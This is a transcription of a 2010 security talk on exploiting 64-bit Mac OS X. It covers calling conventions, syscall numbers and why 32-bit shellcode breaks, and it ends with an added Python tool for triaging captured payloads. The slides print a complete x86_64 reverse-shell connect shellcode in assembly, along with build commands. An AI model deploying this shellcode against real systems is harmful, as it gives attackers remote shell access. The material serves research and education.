Mac OS X Hacking SECURITY ASSESSMENTS


  • Date:04 Jun 2020
  • Pages:81
  • Size:6.63 MB

Transcription:

Former US National Security Agency researcher
First to hack the iPhone and G1 Android phone
Winner of CanSecWest Pwn2Own 2008, 2009, 2010
Fuzzing for Software Security Testing and Quality
The Mac Hacker's Handbook
PhD, CISSP, GCFA, etc.
Wednesday, December 15, 2010

About this talk
The Mac Hacker's Handbook came out in March 2009 and covered Tiger and Leopard.
That summer Snow Leopard came out and broke many of the examples.
This talk covers those differences and how to still exploit Macs.

Background
Fun with 64 bit applications
Sandboxing
Topics in heap overflows

Many processes are now 64 bit. Some older Macs (circa 2007) are different. By default the kernel is still 32 bit.

Darwin Charlie-Millers-Computer.local 10.4.0 Darwin Kernel Version 10.4.0: Fri Apr 23 18:28:53 PDT 2010; root:xnu-1504.7.4~1/RELEASE_I386 i386

64 bit processes, mostly.
Older Macs: all 32 bit.

Safari (newer Macs)
Safari is 64 bit.
32 bit plugins are managed by WebKitPluginAgent.
Plugins may be either 32 or 64 bit, usually 32.
64 bit plugins (Java) are in Safari's address space.

27097  /System/Library/Frameworks/WebKit.framework/WebKitPluginAgent
27106  /System/Library/Frameworks/WebKit.framework/WebKitPluginHost.app/Contents/MacOS/WebKitPluginHost
27345  /System/Library/Frameworks/WebKit.framework/WebKitPluginHost.app/Contents/MacOS/WebKitPluginHost

Crash resiliency

Older Macs (and users who launch Safari under 32 bit)
Plugins run within Safari's 32 bit address space.

__TEXT 00001000-0052b000 [5288K] r-x/rwx SM=COW /Applications/Safari.app/Contents/MacOS/Safari
__TEXT 19dcb000-1a50b000 [7424K] r-x/rwx SM=COW /Users/cmiller/Library/Internet Plug-Ins/Flash Player.plugin/Contents/MacOS/Flash Player

64 bit calling conventions
Mac OS X uses the System V Application Binary Interface, AMD64 Architecture Processor Supplement.
Arguments are passed in rdi, rsi, rdx, rcx, r8, r9, or on the stack if there are more than that or they are larger than a register.
rbx, rsp, rbp, r12-r15 are preserved across function calls.
rax contains the first return value, rdx the second.

System calls
Syscall number in rax + 0x2000000.
rcx will be clobbered; save it if you want it.
Arguments in registers, like calling a function.
Use the syscall instruction.
INT 0x80 can only pass 32 bit values (according to the FreeBSD mailing list).

x86 shellcode doesn't typically work
For example, no Metasploit Mac OS X shellcode works on x86_64.
The only public x86_64 OS X shellcode is from fjserna.
The connect shellcode contains NULLs.

osx_x86_shell_reverse_tcp
The stack is 64 bit; the code expects 32.

0x7fff5fbffa58: 0x5c1102ff 0x00000000 0x0100007f 0x00000000

push 0x100007f
push 0x5c1102ff
mov edi, esp
xor eax, eax
push 0x1        ; wrong calling convention
mov al, 0x61    ; wrong syscall number
int 80 used instead of syscall

Cleaner and smaller version of that shellcode: 120 bytes. Compare with osx_x86_shell_reverse_tcp (65 bytes); fjserna's was 165 bytes.

SECTION .text
GLOBAL start
; socket 0x2000061
xor rdi, rdi
mov rsi, rdi
xor rdx, rdx
mov eax, 0x2000061
; connect 0x2000062
mov rdi, rax
lea rsi, [rel sockaddr_in]
xor rdx, rdx
mov dl, 0x10
mov eax, 0x2000062
; dup2 0x200005a
mov r12, 3
xor rsi, rsi
mov eax, 0x200005a
; execve 0x200003b
lea rdi, [rel cmd]
xor rdx, rdx
mov rsi, rsp
mov eax, 0x200003b
; exit 0x2000001
mov eax, 0x2000001

section .data
sockaddr_in:
dd 0x5c110200 ; port 4444
dd 0x0100007f ; 127.0.0.1

Compile with: /usr/bin/nasm -fmacho64 connect.s; ld -e start -o connect connect.o
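The two 64-bit facts the slides lean on, the 0x2000000 syscall-class prefix and the 8-byte push that breaks a 32-bit sockaddr_in layout, are worth having in a small triage tool, because an analyst looking at a captured OS X x86_64 payload needs to recover the same things: which syscalls it makes and which endpoint its embedded sockaddr_in points at. The following Python is an added example written here, not code from the talk or the book; the syscall numbers are the ones the slides quote, and the lookup table, the function names and the two memory models are this example's own constructions.

```python
import struct
from typing import Dict, List, Tuple

# Mac OS X x86-64 tags a syscall with a class in the high byte of rax; the slides
# use 0x2000000 (the BSD/Unix class), so 0x2000061 is socket(). The numbers in
# this table are the ones the slides quote; the table itself is added here.
SYSCALL_CLASS_MASK = 0xFF000000
BSD_SYSCALL_CLASS = 0x02000000
BSD_SYSCALL_NAMES: Dict[int, str] = {
    0x01: "exit",
    0x3B: "execve",
    0x5A: "dup2",
    0x61: "socket",
    0x62: "connect",
}


def classify_syscall(rax: int) -> Tuple[str, int, str]:
    """Split an rax value into (class, number, name) as the 64-bit syscall entry sees it."""
    cls = rax & SYSCALL_CLASS_MASK
    num = rax & 0x00FFFFFF
    if cls == BSD_SYSCALL_CLASS:
        return ("bsd", num, BSD_SYSCALL_NAMES.get(num, "unknown"))
    if cls == 0:
        # A bare number, which is what 32-bit int 0x80 code such as "mov al, 0x61"
        # leaves in rax: no class byte, so it is not a valid 64-bit syscall number.
        return ("none", num, "invalid for 64-bit syscall")
    return ("other", num, "unknown")


def decode_sockaddr_in(raw: bytes) -> Tuple[int, int, str]:
    """Parse the first 8 bytes of a BSD sockaddr_in: sin_len, sin_family, sin_port (network order), sin_addr."""
    _sin_len, sin_family, sin_port, sin_addr = struct.unpack(">BBH4s", raw[:8])
    return (sin_family, sin_port, ".".join(str(b) for b in sin_addr))


def stack_after_32bit_pushes(immediates: List[int]) -> bytes:
    """Model 'push imm32' executed by a 64-bit CPU: each push writes 8 bytes
    (sign-extended), so values meant to be adjacent land 8 bytes apart.
    `immediates` is given in push order; the result is memory from the final rsp upward."""
    return b"".join(struct.pack("<q", v) for v in reversed(immediates))


def data_section_dwords(dwords: List[int]) -> bytes:
    """Model the NASM '.data' layout from the slides: contiguous little-endian dd entries."""
    return b"".join(struct.pack("<I", d) for d in dwords)


def as_dwords(raw: bytes) -> List[int]:
    """Render memory as the 32-bit words a debugger dump would show."""
    return [struct.unpack("<I", raw[i:i + 4])[0] for i in range(0, len(raw), 4)]


def compare_layouts() -> Dict[str, Tuple[int, int, str]]:
    """Same sockaddr, two layouts: the 32-bit shellcode's pushes versus the 64-bit .data block."""
    pushed = stack_after_32bit_pushes([0x0100007F, 0x5C1102FF])   # the slide's push sequence
    data = data_section_dwords([0x5C110200, 0x0100007F])         # the slide's dd entries
    return {
        "32bit_pushes": decode_sockaddr_in(pushed),
        "data_section": decode_sockaddr_in(data),
    }


if __name__ == "__main__":
    for rax in (0x2000061, 0x2000062, 0x200005A, 0x200003B, 0x2000001, 0x61):
        print(f"rax=0x{rax:x}: {classify_syscall(rax)}")
    pushed = stack_after_32bit_pushes([0x0100007F, 0x5C1102FF])
    print("stack after 32-bit pushes:", [f"0x{d:08x}" for d in as_dwords(pushed)])
    print(compare_layouts())
```

Running it reproduces the slide's stack dump (0x5c1102ff 0x00000000 0x0100007f 0x00000000) from the two pushes, and the decoder shows why that payload cannot work on a 64-bit stack: the port field still reads 4444, but the address field has been displaced by the zero padding and decodes as 0.0.0.0, whereas the contiguous dd layout decodes as 127.0.0.1:4444. The classifier makes the other mismatch visible, since 0x61 without the BSD class byte is not a 64-bit syscall number at all.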
